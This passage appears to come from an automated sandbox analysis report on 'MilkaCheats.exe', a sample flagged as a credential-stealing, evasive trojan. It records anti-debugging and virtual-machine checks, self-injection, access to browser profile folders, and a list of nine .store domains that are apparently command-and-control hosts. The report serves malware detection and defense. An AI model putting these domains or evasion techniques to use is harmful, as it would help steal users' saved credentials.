              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C1_3_01370D9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F9C1_3_01370F9C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C1_3_01370F5C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013652BB1_3_013652BB
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: String function: 000C79D0 appears 54 times
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: String function: 000FACA0 appears 99 times
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: String function: 000FC5A0 appears 152 times
              Source: C:\Users\user\Desktop\MilkaCheats.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6232 -s 232
              Source: MilkaCheats.exe, 00000000.00000000.1664737880.0000000000144000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePrint.Exej% vs MilkaCheats.exe
              Source: MilkaCheats.exe, 00000001.00000003.1672593382.0000000001213000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePrint.Exej% vs MilkaCheats.exe
              Source: MilkaCheats.exe, 00000001.00000002.1848002832.0000000000144000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePrint.Exej% vs MilkaCheats.exe
              Source: MilkaCheats.exeBinary or memory string: OriginalFilenamePrint.Exej% vs MilkaCheats.exe
              Source: MilkaCheats.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: MilkaCheats.exeStatic PE information: Section: .data ZLIB complexity 0.9909225074962519
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/6@3/1
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile created: C:\Users\user\Desktop\static.libJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6232
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\137f0f92-02a8-442e-ba3f-dee856a53db1Jump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeCommand line argument: Window10_2_000C59D6
              Source: C:\Users\user\Desktop\MilkaCheats.exeCommand line argument: static.lib0_2_000C59D6
              Source: C:\Users\user\Desktop\MilkaCheats.exeCommand line argument: static.lib0_2_000C59D6
              Source: C:\Users\user\Desktop\MilkaCheats.exeCommand line argument: static.lib0_2_000C59D6
              Source: MilkaCheats.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\MilkaCheats.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: MilkaCheats.exe, 00000001.00000003.1712714034.00000000039EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: MilkaCheats.exeString found in binary or memory: "app.update.lastUpdateTime.recipe-client-addon-run", 1696333830); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856); user_pref("app.update.lastUpdateTime.xpi-signatur
              Source: MilkaCheats.exeString found in binary or memory: p.update.lastUpdateTime.recipe-client-addon-run", 1696333830); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856); user_pref("app.update.lastUpdateTime.xpi-signature-v
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile read: C:\Users\user\Desktop\MilkaCheats.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\MilkaCheats.exe "C:\Users\user\Desktop\MilkaCheats.exe"
              Source: C:\Users\user\Desktop\MilkaCheats.exeProcess created: C:\Users\user\Desktop\MilkaCheats.exe "C:\Users\user\Desktop\MilkaCheats.exe"
              Source: C:\Users\user\Desktop\MilkaCheats.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6232 -s 232
              Source: C:\Users\user\Desktop\MilkaCheats.exeProcess created: C:\Users\user\Desktop\MilkaCheats.exe "C:\Users\user\Desktop\MilkaCheats.exe"Jump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: MilkaCheats.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: MilkaCheats.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: MilkaCheats.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: MilkaCheats.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: MilkaCheats.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: MilkaCheats.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: MilkaCheats.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: MilkaCheats.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: MilkaCheats.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: MilkaCheats.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: MilkaCheats.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: MilkaCheats.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: MilkaCheats.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_0012CA60 push eax; mov dword ptr [esp], F4F5F6F7h0_2_0012CA6E
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000C6B5A push ecx; ret 0_2_000C6B6D
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000C511C push eax; ret 0_2_000C517C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_013498A1 push ss; retf 1_3_013498A2
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01345899 push cs; retf 1_3_0134589A
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_0134D889 push ds; ret 1_3_0134D88A
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01371423 push cs; retf 1_3_0137142D
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01371423 push cs; retf 1_3_0137142D
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01371423 push cs; retf 1_3_0137142D
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01371423 push cs; retf 1_3_0137142D
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01371423 push cs; retf 1_3_0137142D
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C push esi; retf 0020h1_3_01370F93
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C push esi; retf 0020h1_3_01370F93
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C push esi; retf 0020h1_3_01370F93
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C push esi; retf 0020h1_3_01370F93
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C push esi; retf 0020h1_3_01370F93
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C push esi; retf 0020h1_3_01370F93
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C push esi; retf 0020h1_3_01370F93
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C push esi; retf 0020h1_3_01370F93
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C push esi; retf 0020h1_3_01370F93
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370F5C push esi; retf 0020h1_3_01370F93
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01371423 push cs; retf 1_3_0137142D
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01371423 push cs; retf 1_3_0137142D
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01371423 push cs; retf 1_3_0137142D
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01371423 push cs; retf 1_3_0137142D
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01371423 push cs; retf 1_3_0137142D
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C push esi; retf 0020h1_3_01370F93
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C push esi; retf 0020h1_3_01370F93
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C push esi; retf 0020h1_3_01370F93
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C push esi; retf 0020h1_3_01370F93
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 1_3_01370D9C push esi; retf 0020h1_3_01370F93
              Source: C:\Users\user\Desktop\MilkaCheats.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\MilkaCheats.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeAPI coverage: 6.2 %
              Source: C:\Users\user\Desktop\MilkaCheats.exe TID: 6572Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exe TID: 6548Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000DB239 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_000DB239
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolderJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
              Source: Amcache.hve.4.drBinary or memory string: VMware
              Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: MilkaCheats.exe, 00000001.00000002.1848395056.00000000012F3000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1688344395.00000000012F3000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1847826602.00000000012F3000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1847565217.00000000012F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: MilkaCheats.exe, 00000001.00000002.1848284074.00000000012BD000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1847565217.00000000012BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.4.drBinary or memory string: vmci.sys
              Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
              Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.4.drBinary or memory string: VMware20,1
              Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: MilkaCheats.exe, 00000001.00000002.1848395056.00000000012F3000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1688344395.00000000012F3000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1847826602.00000000012F3000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1847565217.00000000012F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,|
              Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Users\user\Desktop\MilkaCheats.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000C511C LdrInitializeThunk,0_2_000C511C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000CB4F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000CB4F3
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000C59D6 mov edi, dword ptr fs:[00000030h]0_2_000C59D6
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000D951A mov eax, dword ptr fs:[00000030h]0_2_000D951A
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000D18CF mov ecx, dword ptr fs:[00000030h]0_2_000D18CF
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000C59D6 DeleteFileA,VirtualProtect,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,GetStdHandle,WriteConsoleA,GetProcessHeap,HeapFree,0_2_000C59D6
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000C7479 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_000C7479
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000CB4F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000CB4F3
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000C777F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000C777F
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000C790C SetUnhandledExceptionFilter,0_2_000C790C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\MilkaCheats.exeMemory written: C:\Users\user\Desktop\MilkaCheats.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: MilkaCheats.exeString found in binary or memory: scriptyprefej.store
              Source: MilkaCheats.exeString found in binary or memory: navygenerayk.store
              Source: MilkaCheats.exeString found in binary or memory: founpiuer.store
              Source: MilkaCheats.exeString found in binary or memory: necklacedmny.store
              Source: MilkaCheats.exeString found in binary or memory: thumbystriw.store
              Source: MilkaCheats.exeString found in binary or memory: fadehairucw.store
              Source: MilkaCheats.exeString found in binary or memory: crisiwarny.store
              Source: MilkaCheats.exeString found in binary or memory: presticitpo.store
              Source: MilkaCheats.exeString found in binary or memory: messejawu.store
              Source: C:\Users\user\Desktop\MilkaCheats.exeProcess created: C:\Users\user\Desktop\MilkaCheats.exe "C:\Users\user\Desktop\MilkaCheats.exe"Jump to behavior
